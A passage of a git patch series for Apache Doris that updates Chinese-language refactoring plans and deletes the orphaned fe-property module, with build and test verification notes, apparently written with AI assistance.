org.apache.doris.property`(排除 fe-property dir)= **0 import**;**无 BE/docker/脚本/regression 引用** → 删除限于 `fe/`。 +- **TDD/验收**:**RED/GREEN = 构建闸**(无 UT 可写,同 P1-T05):删后**全 FE 构建 + paimon 全模块 UT 仍绿(278/0/1skip)= 证无隐藏 transitive 断裂**;`git status` 确认 `fe/fe-property/` 删除 + `fe/pom.xml` 两声明删除;checkstyle 0;import-gate PASS;白名单干净。**注意 maven**:删 module 后用 `-am package -Dassembly.skipAssembly=true -Dmaven.build.cache.enabled=false`(绝对 `-f`),并跑一次更大范围 reactor 编译确认无别处 transitive 依赖 fe-property(dependencyManagement 删除后若有隐藏消费者会编译失败=正好暴露)。 +- **依赖**:P1-T05。设计 §4 P1-5(物理删除的「后续任务」即此)。**⚠️ 超 D-005 原范围,已获用户专门授权(D-016)。** -**P2-T05(docker 真闸,合并 P1-T06 的 T1 + P2 的 T2)**:paimon 5 flavor(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS,`enablePaimonTest=true`。**P2-T03 未离线验的**:①HMS/DLF live `metastore=hive`(IMetaStoreClient 从 host hive-catalog-shade 解析 + 子优先 Configuration/HiveConf 跨 loader identity 危害,见 `PaimonConnector` HMS/DLF 分支 NOTE);②上面 P2-T04 的 plugin-zip ServiceLoader 发现;③T1 storage 等价(S3/OSS/COS/OBS/HDFS + 无凭据对象存储 + 调优默认)。**D-014 行为变更**(CREATE 更严)也在此真验。 +**P2-T04(paimon pom + gate 核对)— P1-T07 之后**: +- **做什么**:核 `fe-connector-paimon/pom.xml` 依赖集 = `fe-connector-{api,spi}` + `fe-connector-metastore-spi`(transitively 带 metastore-api + fe-kerberos)+ `fe-filesystem-api` + `fe-thrift(provided)` + paimon SDK + hadoop/aws/…;`tools/check-connector-imports.sh` PASS(P2-T03 已验 exit 0,复核即可)。 +- **⚠️ P2-T03 recon 揪出的真正 substance(不只是 packaging 复核——可能要 1 行改 metastore-spi,白名单内)**:`MetaStoreProviders.load()` 用 **1-arg `ServiceLoader.load(MetaStoreProvider.class)`(TCCL-based)**;static `PROVIDERS` 在首次 `bind()`(= `validateProperties` 在 CREATE CATALOG)初始化,而该路径**不 pin TCCL 到插件 loader**(仅 `createCatalogFromContext` pin)。metastore-spi 在插件 zip **child-first lib/**(assembly 已确认 bundle、不在 excludes),**不在 fe-core classpath**。若 class-init 时 TCCL≠插件 loader → ServiceLoader 找不到 child-first 的 `META-INF/services` → **0 provider → `bind` 抛「No MetaStoreProvider supports」→ 所有 paimon CREATE/读 挂**。UT(单 flat loader)结构上抓不到。**建议 fix**:改 **2-arg `ServiceLoader.load(MetaStoreProvider.class, MetaStoreProviders.class.getClassLoader())`**(用模块自身 loader 发现,与 TCCL 无关;对标 `FileSystemPluginManager:99` 对插件 provider 用显式 loader)。执行前先读 fe-core 插件调用路确认 TCCL 是否被 pin,但 2-arg 形式无论如何更稳。 +- **依赖**:P1-T07, P2-T03 ✅。设计 §4 P2-4。 + +**P2-T05(docker 真闸,合并 P1-T06 的 T1 + P2 的 T2)**:paimon 5 flavor + vended(REST/DLF) + Kerberos HMS,`enablePaimonTest=true`。真验 UT 抓不到的:①上面 P2-T04 的 plugin-zip ServiceLoader 发现(child-first loader);②HMS/DLF live `metastore=hive`(IMetaStoreClient 从 host hive-catalog-shade + 跨 loader Configuration/HiveConf identity,见 `PaimonConnector` HMS/DLF NOTE);③T1 storage 等价(S3/OSS/COS/OBS/HDFS + 无凭据对象存储 + 调优默认);④D-014 CREATE 更严行为。 - **依赖**:P2-T03 ✅, P2-T04。设计 §4 P2-5 / §5 T2,T4。 ## 未决 / 需注意 diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md index db5434c3e6e15c..9dacb6e162ff15 100644 --- a/plan-doc/metastore-storage-refactor/PROGRESS.md +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -12,12 +12,13 @@ | Design(设计) | ██████████ 100% | ✅ 完成(设计文档 + **7 决策** D-001..D-008,范围已收窄) | | **Implement(实现)** | █████████░ ~72% | 🚧 **进行中**(P0 ✅;P1 5/6 P1-T06 推迟[D-012];**P2 3/5 = P2-T01+P2-T02+P2-T03 ✅**;P3a facts 切片 ✅) | -任务计数:**11 / 14** 完成(P0: 2/2 ✅ | P1: 5/6,**P1-T06 推迟** | **P2: 3/5(P2-T01 + P2-T02 + P2-T03 ✅)** | P3a: facts 切片 ✅ 机制待续)| + FU-T01/02/03 ✅、P3b 占位。**下一步 = P2-T04**(paimon pom + gate 核对,⚠️ 核 plugin-zip 含 metastore-spi 的 META-INF/services),然后 **P2-T05** docker 真闸。 +任务计数:**11 / 15** 完成(P0: 2/2 ✅ | P1: 5/7,**P1-T06 推迟** + **P1-T07 新增** | **P2: 3/5(P2-T01 + P2-T02 + P2-T03 ✅)** | P3a: facts 切片 ✅ 机制待续)| + FU-T01/02/03 ✅、P3b 占位。**下一步 = P1-T07**(彻底删除 fe-property 孤儿模块,用户 2026-06-18 定为下一阶段、D-016 授权超 D-005),然后 **P2-T04**(pom+gate,⚠️ MetaStoreProviders ServiceLoader 改 2-arg 显式 loader)→ **P2-T05** docker 真闸。 --- ## 当前活跃 task -- **P2-T03 ✅ 完成(2026-06-18,commit `3c1e118dcfa`)**:paimon adapter cutover 到共享 metastore-spi。下一步 = **P2-T04**(pom + gate 核对,⚠️ 必核 plugin-zip 含 metastore-spi 的 `META-INF/services` 否则运行时 ServiceLoader 发现不到 5 provider),然后 **P2-T05** docker 真闸(HMS/DLF live + plugin-zip ServiceLoader + T1/T2 等价 + D-014 收敛行为)。 +- **下一步 = P1-T07(彻底删除 fe-property 孤儿模块)**(2026-06-18 用户定为下一阶段,**D-016** 授权——超 D-005「不删 fe-property」条款;fe-core 两包仍禁碰)。P1-T05 断边后 fe-property 已 0 消费者;whole-repo recon 证仅 `fe/pom.xml`(module+depMgmt)+ 5 处 stale 注释引用、0 import、无 BE/docker/脚本引用→删除限 `fe/`。做法=删目录 + fe/pom.xml 两声明 + 可选清注释;RED/GREEN=构建闸(全 FE 编译 + paimon 278/0/1skip 仍绿)。WORKFLOW §4.1 白名单已更新(fe-property 移入允许删除区)。**之后** P2-T04(pom+gate,⚠️ `MetaStoreProviders.load()` 改 2-arg `ServiceLoader.load(…, MetaStoreProviders.class.getClassLoader())` 防 child-first loader 下 TCCL 发现不到 provider)→ P2-T05 docker 真闸。 +- **P2-T03 ✅ 完成(2026-06-18,commit `3c1e118dcfa`)**:paimon adapter cutover 到共享 metastore-spi(详见最近动态)。 - **FU-T02 ✅ + FU-T03 ✅ 完成(2026-06-18,D-011 授权)**:P1-T06 前的两项 fe-filesystem 对象存储补齐均完成(**R-008 + R-006 闭环**)。 - **FU-T02(R-008,commit `e5b088b14e7`)**:`Oss/Cos/ObsFileSystemProperties.toBackendKv()` 内联镜像 legacy `AbstractS3CompatibleProperties.getAwsCredentialsProviderTypeForBackend()`——ak/sk 皆空→`AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`、否则省略。**DV-005**:不加字段/枚举(legacy OSS/COS/OBS 本无可配置 provider type,且 `S3CredentialsProviderType` 在 s3 模块、oss/cos/obs 不依赖)。TDD RED(`expected but was `)→GREEN;OSS 13/0·COS 12/0·OBS 12/0 + 全模块绿、checkstyle 0。 - **FU-T03(R-006,本次 commit)**:4 个 `*FileSystemPropertiesTest` 各加 1 个调优默认守护测试(BE map + Hadoop map,字面量期望值非常量);S3 50/3000/1000、OSS/COS/OBS 100/10000/10000(已核 legacy parity);mutation 改 4 个 `DEFAULT_MAX_CONNECTIONS`→ 4 测全红证有效。S3 15/0·OSS 14/0·COS 13/0·OBS 13/0 + sibling 绿、checkstyle 0。纯 test-only。 @@ -41,6 +42,7 @@ --- ## 最近动态(最近 7 天) +- 2026-06-18 **D-016 + P1-T07 新增(用户定下一阶段=彻底删除 fe-property)**:用户授权物理删除已 0 消费者的 fe-property 孤儿模块,**超 D-005「不删 fe-property」条款**(fe-core `datasource.property.{storage,metastore}` 两包不变,仍服务 hive/hudi/iceberg)。whole-repo recon:仅 `fe/pom.xml`(module+depMgmt 真引用)+ 5 处 stale 注释、`org.apache.doris.property` import=0、无 BE/docker/脚本/regression 引用→删除限 `fe/`。新增 **P1-T07**(删目录+fe/pom.xml 两声明+可选清注释,RED/GREEN=构建闸),WORKFLOW §4.1 白名单把 `fe/fe-property/**` 移入允许删除区,HANDOFF「下一步」改为 P1-T07(先于 P2-T04/T05)。**仅文档更新,未删代码**(执行留下一 session)。 - 2026-06-18 **P2-T03 ✅(paimon adapter cutover 到共享 metastore-spi,commit `3c1e118dcfa`)**:直接读真实代码全路 + 对抗 recon `wf_9437dd4e-06d`(6 reader+synth+verify=SOUND/READY,逐键 parity 通过)→ 2 边界经 AskUserQuestion 定:**D-014**(采用 spi legacy-faithful validate——CREATE CATALOG 比当前 paimon 更严:HMS forbidIf(simple)/requireIf(kerberos)、REST case-sensitive `"dlf".equals`、DLF 在 CREATE 要求 OSS;故意向 legacy 收敛)、**D-015**(JDBC 注册副作用留连接器,仅纯 `resolveDriverUrl` 共享,Rule 2 不投机)。**改 5 main+2 test+pom**(白名单内,净 +318/−847):`validateProperties`→`MetaStoreProviders.bind(props,{}).validate()`;`createCatalog` HMS/DLF→`bind`+新薄 `PaimonCatalogFactory.assembleHiveConf(base,overrides)`(HMS seed `loadHiveConfResources` base 再叠 `toHiveConfOverrides`,DLF `assembleHiveConf(null,toDlfCatalogConf())`)、删 build-time `requireOssStorageForDlf`;两处 driver-url→`JdbcDriverSupport.resolveDriverUrl`;`PaimonCatalogFactory` 删 6 法+`KNOWN_FLAVORS`+加 `assembleHiveConf`;`PaimonConnectorProperties` 删 `DLF_*`/`REST_TOKEN_PROVIDER`/`REST_DLF_*`(**DV-008**:别名数组只**部分**删,`HMS_URI`/`REST_URI`/`JDBC_*` 仍被 `buildCatalogOptions` 用故保留;`bind` 取代设计早期 `*MetastoreBackend.parse`;`assembleHiveConf` 为离线测 F2 而抽)。**TDD**:新 `PaimonConnectorValidatePropertiesTest` 13/0(3 tightening RED→GREEN 实证)+ 删 28 旧 builder/validate 测(content parity 已由 spi `Hms/DlfMetaStorePropertiesTest` 13+7 覆盖)+ 2 `assembleHiveConf` 测。**验证 paimon 全模块 278/0/1skip**、checkstyle 0、import-gate exit 0、白名单干净。**对抗 review `wf_dd78ec4b-da5`**(4 lens+verify=READY,0 真 finding;唯一 MAJOR「kerberos.principal alias 未测」证伪=该键走 verbatim passthrough→测它恒真 tautology 违 Rule 9,隔离 binding 的 `service.principal`→`kerberos.principal` 方向已被 spi line72/80 覆盖)。⚠️ **docker e2e 未跑**(HMS/DLF live metastore=hive + plugin-zip ServiceLoader 发现 5 provider 在子优先 loader=P2-T04/T05 真闸)。**下一步 P2-T04**。 - 2026-06-18 **P2-T02 ✅(新建 fe-connector-metastore-spi,commit `7ea63528bc4`)**:recon workflow `wf_187e052d-230`(4 reader+synth,证两 deviation)+ 直接核实 → 3 边界经 AskUserQuestion 定(**DV-006** fe-kerberos compile-dep-only 零新代码、**DV-007** storage 中立 Map 模块 hadoop/fs-free、全 5 后端一次 commit)。建 22 文件:`MetaStoreProvider` SPI + `MetaStoreProviders` first-hit ServiceLoader 派发 + `MetaStoreParseUtils` + `JdbcDriverSupport.resolveDriverUrl`(纯 resolver;注册留 P2-T03)+ `AbstractMetaStoreProperties` + 5 `*Impl`(`@ConnectorProperty`,消灭手抄别名)+ 5 provider(`sensitivePropertyKeys` 暴露 sensitive 键)+ 单 services 文件。来源=上移 paimon `PaimonCatalogFactory` 手抄逻辑去 fe-core 化(HiveConf→中立 Map、authenticator→`KerberosAuthSpec` facts)。**HMS D-4 补回** forbidIf-simple/requireIf-kerberos(CASE-SENSITIVE `Objects.equals` 对齐 ParamRules,保留与 conf-build `equalsIgnoreCase` 的不对称)。验证 spi **41/0**、checkstyle 0、import-gate 0、**3 mutation 证**(RED→GREEN)。**对抗 review `wf_2ddae04d-cf9`(4 lens+verify)**:0 BLOCKER;1 真 MAJOR=**REST token-provider `equalsIgnoreCase`→`"dlf".equals`**(paimon 手抄 latent bug,legacy ParamRules 权威)已修;FS `supports()` 去 trim 不对称 + 对齐 legacy;DV-006/007/D-006/D-4 独立核实正确;trim/accessPublic-proxyMode 经核证对齐权威 legacy contract(不改);补 12 测覆盖缺口。**API 旁改 2 javadoc**(诚实订正,白名单内)。**下一步 P2-T03**(必接 hive.conf.resources base + kerberos() doAs 契约 + driver 注册下移)。⚠️ docker 未跑(T2 真闸 P2-T05)。 - 2026-06-18 **进入 P2(metastore SPI):P3a-T01 facts-carrier ✅ + P2-T01 ✅**(D-012 跳过/推迟 P1-T06 docker;D-013 用户选 fe-kerberos 先建)。**P3a-T01 facts 切片**(commit `51df4fccd01`)新建顶层叶子 `fe-kerberos`(零依赖)= `AuthType`(SIMPLE/KERBEROS, fromString 仅 "kerberos" 命中) + `KerberosAuthSpec`(principal/keytab 不可变值对象, hasCredentials 需两者);6 测绿、checkstyle 0。**P2-T01**(本次 commit)新建 `fe-connector-metastore-api`:`MetaStoreProperties`(providerName + needsStorage/needsVendedCredentials 默认 false + validate no-op + raw/matched,**无 MetaStoreType 枚举** D-006)+ HMS/DLF/REST/JDBC/FileSystem 5 子接口(中立 Map/标量;HMS 经 fe-kerberos `AuthType`/`Optional`);依赖仅 fe-kerberos(D-013;fe-foundation/fe-filesystem-api 留 spi 用时再加);契约测试 3/0、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import。未建 Glue/S3Tables(留扩展)。⚠️ docker 全程未跑(留 P2-T05)。**下一步 P2-T02**。 diff --git a/plan-doc/metastore-storage-refactor/WORKFLOW.md b/plan-doc/metastore-storage-refactor/WORKFLOW.md index 1125526a747b3a..3b0600454c6f1c 100644 --- a/plan-doc/metastore-storage-refactor/WORKFLOW.md +++ b/plan-doc/metastore-storage-refactor/WORKFLOW.md @@ -60,14 +60,16 @@ fe/fe-core/src/main/java/.../fs/FileSystemFactory.java (仅新增 fe/fe-filesystem/fe-filesystem-hdfs/** (FU-T01:HDFS typed BE model;D-010 授权局部解禁) fe/fe-filesystem/fe-filesystem-{s3,oss,cos,obs}/** (FU-T02 R-008 / FU-T03 R-006;D-011 授权;main+test;其它 fe-filesystem 模块[api,spi,azure,broker,local]仍禁碰) fe/fe-kerberos/** (新建;P3a-T01 fe-kerberos 叶子;D-007/D-013) -fe/fe-connector/pom.xml ; fe/pom.xml (仅新增模块声明) +fe/fe-property/** (P1-T07:彻底删除该孤儿模块;D-016 授权,覆盖 D-005 不删条款) +fe/fe-connector/pom.xml (仅新增模块声明) +fe/pom.xml (新增模块声明;P1-T07 额外允许删除 fe-property 的 +dependencyManagement 条目,D-016) plan-doc/metastore-storage-refactor/** (本跟踪目录) ``` **禁止**出现的路径(出现即停、回滚或记偏差): - `fe/fe-core/src/main/java/.../datasource/property/storage/**`(fe-core 旧 storage 包,保持不动) - `fe/fe-core/src/main/java/.../datasource/property/metastore/**`(fe-core 旧 metastore 包,保持不动) - `fe/fe-connector/fe-connector-{hive,hudi,iceberg,es,jdbc,maxcompute,trino}/**`(其它连接器,不动) -- `fe/fe-property/**` 的删除(本次只断 paimon 依赖边,不删模块) +- ~~`fe/fe-property/**` 的删除~~ → **P1-T07 已授权删除(D-016)**,移入上方允许区(fe-core 两包仍禁碰) ### 4.2 依赖方向(CI gate + 人工核对) - `fe-connector-*` 不得 import `org.apache.doris.{catalog,common,datasource,qe,analysis,nereids,planner}`(`tools/check-connector-imports.sh`)。 diff --git a/plan-doc/metastore-storage-refactor/decisions-log.md b/plan-doc/metastore-storage-refactor/decisions-log.md index 67c066b6300664..61bbe980aad00e 100644 --- a/plan-doc/metastore-storage-refactor/decisions-log.md +++ b/plan-doc/metastore-storage-refactor/decisions-log.md @@ -5,6 +5,14 @@ --- +## D-016 — 授权彻底删除 fe-property 模块(超 D-005,定为下一阶段 P1-T07) +- **日期**:2026-06-18 | **决策者**:用户(「下一阶段,彻底删除 fe-property 模块」) +- **背景**:P1-T05 断开 paimon→fe-property 依赖边后,fe-property 成 **0 消费者孤儿**(whole-repo 核实:除 `fe/pom.xml` 的 ``+dependencyManagement 外,无任何 pom `` 它、无任何源 `import org.apache.doris.property.*`、无 BE/docker/脚本/regression 引用;仅 5 处 stale **注释**在 paimon+fe-filesystem-hdfs 提到「移植源/replaces fe-property…」)。D-005/设计 P1-5 当初把物理删除「留待后续任务」,WORKFLOW §4.1 把 `fe/fe-property/**` 的删除列为**禁止**。 +- **内容**:用户**授权现在物理删除 fe-property**,并定为**下一阶段(新任务 P1-T07)**,**先于** P2-T04/T05。**本决策就 fe-property 这一项覆盖 D-005「不物理删 fe-property」条款**(D-005 的其余条款——不删 fe-core `datasource.property.{storage,metastore}` 两包、不动其它连接器——**不变**:那两包仍服务 hive/hudi/iceberg,本次不碰)。 +- **白名单扩**:WORKFLOW §4.1 把 `fe/fe-property/**` 从「禁止删除」移到「**允许删除**」;`fe/pom.xml` 允许**删除** `fe-property` + 其 dependencyManagement 条目(原白名单只允许「新增模块声明」,此处扩为「删除 fe-property 的模块/版本声明」)。 +- **范围/做法(P1-T07,执行在下一 session)**:删 `fe/fe-property/` 目录 + `fe/pom.xml` 两处声明;whole-repo 复核 0 引用后**全 FE 构建验证**(`-am package`);**可选**清理 5 处 stale 注释(fe-filesystem-hdfs `HdfsFileSystemProperties`/`HdfsConfigFileLoader` + paimon `PaimonCatalogFactory`/`PaimonConnector`/`PaimonCatalogFactoryTest` 里提到 fe-property 的注释,删模块后变悬空引用——均白名单内文件)。**RED/GREEN=构建闸**(无 UT 可写:删孤儿模块后全构建+全 UT 仍绿=证无隐藏 transitive 断裂,同 P1-T05 模式)。 +- **理由**:fe-property 已 0 消费者(被 fe-filesystem typed 模型取代),保留=死代码;用户优先清理。**被否**:继续延后到「全部连接器迁完一起清」(fe-property 与 fe-core 两包不同——fe-property 唯一消费者 paimon 已断,可独立删;fe-core 两包仍有 hive/hudi/iceberg 消费者,须留)。 + ## D-015 — P2-T03 JDBC driver 注册副作用留连接器,仅纯 `resolveDriverUrl` 共享(不下移注册) - **日期**:2026-06-18 | **决策者**:用户(AskUserQuestion 选「方案 A:注册留连接器(推荐)」) - **背景**:P2-T02 只上移了纯 `JdbcDriverSupport.resolveDriverUrl`(其 javadoc 明记 live 注册「无调用方、P2-T03 前不搬,Rule 2」)。HANDOFF 把「driver 注册下移与否」列为 P2-T03 决策点。driver 逻辑两消费方:①`PaimonConnector`(FE 侧)真执行注册(`DriverManager.registerDriver`+`DriverShim`+静态 `DRIVER_CLASS_LOADER_CACHE`/`REGISTERED_DRIVER_KEYS`);②`PaimonScanPlanProvider.getBackendPaimonOptions`(BE 选项)只解析 URL 不注册。唯一共享=`resolveDriverUrl`。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index d7f776ed621845..e832d4551b77b3 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -75,7 +75,14 @@ ### P1-T06 ⬜ P1 验证 - **做什么**:paimon UT 全绿;docker `enablePaimonTest=true` 5 flavor;T1 等价性测试。 - **验收**:见 WORKFLOW §5;若不跑 docker 明确标注"未跑 e2e"。 -- **依赖**:P1-T02..T05。设计 §4 P1-6 / §5 T1,T4。 +- **依赖**:P1-T02..T05。设计 §4 P1-6 / §5 T1,T4。**(推迟,docker 折入 P2-T05;D-012)** + +### P1-T07 ⬜ 彻底删除 fe-property 孤儿模块(**下一阶段**;D-016 授权,超 D-005) +> **用户 2026-06-18 定为下一阶段,先于 P2-T04/T05。** P1-T05 断边后 fe-property 已 0 消费者;本任务物理删除它。 +- **做什么**:① 删 `fe/fe-property/` 整个目录(26 java,package `org.apache.doris.property`);② 删 `fe/pom.xml` 的 `fe-property`(:222)+ dependencyManagement 里 fe-property 条目(:831);③ **可选** 清理 5 处 stale 注释(删模块后悬空):`fe-filesystem-hdfs` 的 `HdfsFileSystemProperties`/`HdfsConfigFileLoader`(「移植源 = fe-property…」)+ paimon 的 `PaimonCatalogFactory`/`PaimonConnector`/`PaimonCatalogFactoryTest`(「replaces/ported from legacy fe-property…」)——均白名单内文件,注释订正非改逻辑。 +- **现场 recon(2026-06-18 已做,执行 session 须复核)**:whole-repo `grep -rln fe-property`(排除 .git/fe-property/plan-doc/target)= 仅 `fe/pom.xml`(真)+ 上述 5 文件(注释);`grep org.apache.doris.property`(排除 fe-property dir)= **0 import**;**无 BE/docker/脚本/regression-conf 引用**。删除内容**限于 fe/**。**fe-core `datasource.property.{storage,metastore}` 两包不碰**(仍服务 hive/hudi/iceberg,D-016 明确只删 fe-property)。 +- **TDD/验收**:**RED/GREEN = 构建闸**(无 UT 可写,同 P1-T05 模式):删后**全 FE 构建**(`mvn -f fe/pom.xml … package`,至少 `-pl fe-connector/fe-connector-paimon -am` + 一次全 reactor 编译)+ **paimon 全模块 UT 仍绿(278/0/1skip)= 证无隐藏 transitive 断裂**;`grep -rn fe-property fe/`(排除 plan-doc)只剩(若保留注释则)注释或全清;checkstyle 0;import-gate PASS;`git status` 确认 `fe/fe-property/` 已删 + `fe/pom.xml` 两处声明已删。 +- **依赖**:P1-T05(断边)。D-016。**⚠️ 超 D-005 原范围,已获用户专门授权。** --- From 13d3876d25d4930bd3b560de8a2df205997eef12 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 19:22:44 +0800 Subject: [PATCH 097/128] [P1-T07] fe-property: delete orphan module (0 consumers after P1-T05) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit P1-T05 severed paimon -> fe-property; fe-property has been a 0-consumer orphan ever since (fe-filesystem typed models took over). D-016 authorizes its physical deletion (overrides D-005's 'do not delete fe-property' clause; fe-core datasource.property.{storage,metastore} stay, still serving hive/hudi/iceberg). Changes (all whitelisted): - Delete fe/fe-property/ (26 java + pom). - fe/pom.xml: drop fe-property + its dependencyManagement entry. - Retire 5 stale 'fe-property' provenance comments -> 'legacy' (paimon PaimonCatalogFactory/PaimonConnector/PaimonCatalogFactoryTest + fe-filesystem-hdfs HdfsConfigFileLoader/HdfsFileSystemProperties); wording only, no logic change. Verification (RED/GREEN = build gate, no UT to write — same as P1-T05): - whole-repo grep 'fe-property' (excl plan-doc) = 0; grep 'org.apache.doris.property' = 0. - Full FE reactor test-compile BUILD SUCCESS (build-cache disabled; fe-core compile+testCompile actually ran; 54 modules; 0 ERROR) -> no hidden transitive consumer of the removed module / dependencyManagement entry. - paimon module 278/0/1skip; fe-filesystem-hdfs 78/0/0; checkstyle 0; tools/check-connector-imports.sh exit 0. - docker e2e NOT run (deferred to P2-T05 per D-012). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonCatalogFactory.java | 4 +- .../connector/paimon/PaimonConnector.java | 4 +- .../paimon/PaimonCatalogFactoryTest.java | 2 +- .../filesystem/hdfs/HdfsConfigFileLoader.java | 5 +- .../hdfs/HdfsFileSystemProperties.java | 5 +- fe/fe-property/pom.xml | 137 ------ .../doris/property/ConnectionProperties.java | 139 ------ .../doris/property/PropertyConfigLoader.java | 81 ---- .../common/AwsCredentialsProviderMode.java | 74 ---- .../AbstractS3CompatibleProperties.java | 318 -------------- .../property/storage/AzureProperties.java | 334 -------------- .../property/storage/AzurePropertyUtils.java | 244 ----------- .../property/storage/BrokerProperties.java | 114 ----- .../doris/property/storage/COSProperties.java | 172 -------- .../doris/property/storage/GCSProperties.java | 189 -------- .../storage/HdfsCompatibleProperties.java | 51 --- .../property/storage/HdfsProperties.java | 219 ---------- .../property/storage/HdfsPropertiesUtils.java | 275 ------------ .../property/storage/HttpProperties.java | 92 ---- .../property/storage/LocalProperties.java | 89 ---- .../property/storage/MinioProperties.java | 143 ------ .../doris/property/storage/OBSProperties.java | 204 --------- .../property/storage/OSSHdfsProperties.java | 217 ---------- .../doris/property/storage/OSSProperties.java | 380 ---------------- .../storage/ObjectStorageProperties.java | 50 --- .../property/storage/OzoneProperties.java | 153 ------- .../doris/property/storage/S3Properties.java | 358 --------------- .../property/storage/S3PropertyUtils.java | 228 ---------- .../apache/doris/property/storage/S3URI.java | 404 ----------------- .../property/storage/StorageProperties.java | 409 ------------------ .../storage/exception/AzureAuthType.java | 23 - .../storage/StoragePropertiesTest.java | 117 ----- fe/pom.xml | 6 - .../metastore-storage-refactor/HANDOFF.md | 26 +- .../metastore-storage-refactor/PROGRESS.md | 8 +- plan-doc/metastore-storage-refactor/tasks.md | 4 +- 36 files changed, 29 insertions(+), 5249 deletions(-) delete mode 100644 fe/fe-property/pom.xml delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/ConnectionProperties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/PropertyConfigLoader.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/common/AwsCredentialsProviderMode.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/AbstractS3CompatibleProperties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/AzureProperties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/AzurePropertyUtils.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/BrokerProperties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/COSProperties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/GCSProperties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsCompatibleProperties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsProperties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsPropertiesUtils.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/HttpProperties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/LocalProperties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/MinioProperties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/OBSProperties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/OSSHdfsProperties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/OSSProperties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/ObjectStorageProperties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/OzoneProperties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/S3Properties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/S3PropertyUtils.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/S3URI.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/StorageProperties.java delete mode 100644 fe/fe-property/src/main/java/org/apache/doris/property/storage/exception/AzureAuthType.java delete mode 100644 fe/fe-property/src/test/java/org/apache/doris/property/storage/StoragePropertiesTest.java diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java index 9bd8cdbb41dd3a..a04c7ee3c35b8c 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java @@ -231,7 +231,7 @@ private static void appendDlfOptions(Options options) { * ({@code s3.*}/{@code oss.*}/{@code cos.*}/{@code obs.*}/{@code AWS_*} -> {@code fs.s3a.*} / * Jindo {@code fs.oss.*} / etc.), computed upstream by the connector from * {@code ConnectorContext.getStorageProperties()} via fe-filesystem's - * {@code toHadoopProperties().toHadoopConfigurationMap()} (P1-T03; replaces the fe-property + * {@code toHadoopProperties().toHadoopConfigurationMap()} (P1-T03; replaces the legacy * {@code StorageProperties.buildObjectStorageHadoopConfig(props)} call); *

  • {@code paimon.s3.*} / {@code paimon.s3a.*} / {@code paimon.fs.s3.*} / {@code paimon.fs.oss.*} * are normalized to the Hadoop S3A prefix {@code fs.s3a.} (strip the matched prefix, @@ -267,7 +267,7 @@ public static Configuration buildHadoopConfiguration(Map props, *
      *
    1. the pre-computed {@code storageHadoopConfig} (canonical object-store translation, produced * upstream from {@code ConnectorContext.getStorageProperties()} via fe-filesystem's - * {@code toHadoopConfigurationMap()}; replaces the fe-property + * {@code toHadoopConfigurationMap()}; replaces the legacy * {@code StorageProperties.buildObjectStorageHadoopConfig(props)} call);
    2. *
    3. the original {@code paimon.s3./s3a./fs.s3./fs.oss.} re-key + raw {@code fs./dfs./hadoop.} * passthrough, which run LAST and overlay the canonical translation (last-write-wins = diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java index 48763bde2ae59a..30c4f1ef8a5fbc 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java @@ -133,7 +133,7 @@ private Catalog createCatalog() { Options options = PaimonCatalogFactory.buildCatalogOptions(properties); String flavor = PaimonCatalogFactory.resolveFlavor(properties); // Canonical object-store storage config from the FE-bound fe-filesystem StorageProperties - // (P1-T03), replacing the legacy fe-property buildObjectStorageHadoopConfig path. Empty for + // (P1-T03), replacing the legacy buildObjectStorageHadoopConfig path. Empty for // 